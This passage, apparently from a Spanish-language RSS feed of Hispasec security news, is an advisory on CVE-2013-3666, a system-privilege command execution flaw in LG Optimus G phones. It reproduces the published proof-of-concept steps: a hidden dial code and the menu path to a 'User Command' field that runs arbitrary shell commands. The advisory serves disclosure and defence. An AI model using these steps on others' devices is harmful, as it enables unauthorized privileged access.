&lt;span style="font-size: 13pt;"&gt;Se ha descubierto &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;una vulnerabilidad en el software de algunos smartphones de LG&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; que podría permitir la ejecución de comandos con privilegios de system en el teléfono.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-z5evF6mWFXA/UaOZLqCVclI/AAAAAAAACjY/LkqNb215Hro/s1600/LG_Optimus_G.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="247" src="http://3.bp.blogspot.com/-z5evF6mWFXA/UaOZLqCVclI/AAAAAAAACjY/LkqNb215Hro/s320/LG_Optimus_G.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
La vulnerabilidad se ha encontrado en un teléfono &lt;b&gt;LG Optimus G E973 con sistema operativo Android 4.1.2&lt;/b&gt;. El fallo se debe a un error al procesar la configuración del teléfono en el menú oculto del software de LG.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Se ha publicado una &lt;b&gt;prueba de concepto&lt;/b&gt; para aprovechar la vulnerabilidad, son los siguientes pasos:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;Se puede desplegar el menú oculto de LG marcando en el teléfono el número "3845#*XXX#", siendo XXX el modelo del teléfono LG.&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/li&gt;
&lt;li&gt;Se debe seleccionar la opción "&lt;i&gt;WLAN test&lt;/i&gt;" del menú, después la opción "&lt;i&gt;Wi-Fi Ping Test/User Command&lt;/i&gt;", y a continuación seleccionar la opción "&lt;i&gt;User Command&lt;/i&gt;".&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/li&gt;
&lt;li&gt;A continuación se puede borrar el comando que aparece (tcpdump) y luego escribir el comando shell que se desea ejecutar en el teléfono y presionar "&lt;i&gt;CANCEL&lt;/i&gt;" para cancelar el comando, lo que por error en el software ejecutará el comando introducido.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Puesto que la aplicación tiene los mayores privilegios, &lt;b&gt;se pueden realizar diferentes acciones inicialmente restringidas sobre el teléfono&lt;/b&gt;. A la vulnerabilidad se le ha asignado el identificador CVE-2013-3666 y ha sido probado en un LG modelo 973, con un video en Youtube mostrando la vulnerabilidad.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/ZfbDIpTY-t4" width="420"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;a href="http://youtu.be/ZfbDIpTY-t4"&gt;http://youtu.be/ZfbDIpTY-t4&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La vulnerabilidad no se puede reproducir en todos los LG disponibles pero otras versiones diferentes a la comprobada en el vídeo pueden ser también vulnerables.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Full Disclosure&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://seclists.org/fulldisclosure/2013/May/166"&gt;http://seclists.org/fulldisclosure/2013/May/166&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Jose Ignacio Palacios Ortega&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:jipalacios@hispasec.com"&gt;jipalacios@hispasec.com&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;pre style="orphans: 2; text-align: -webkit-auto; widows: 2;"&gt;&lt;/pre&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/419qN76xejE" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/419qN76xejE/elevacion-de-privilegios-en-telefonos.html</link><author>noreply@blogger.com (Hispasec)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-z5evF6mWFXA/UaOZLqCVclI/AAAAAAAACjY/LkqNb215Hro/s72-c/LG_Optimus_G.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/05/elevacion-de-privilegios-en-telefonos.html</feedburner:origLink></item></channel></rss>
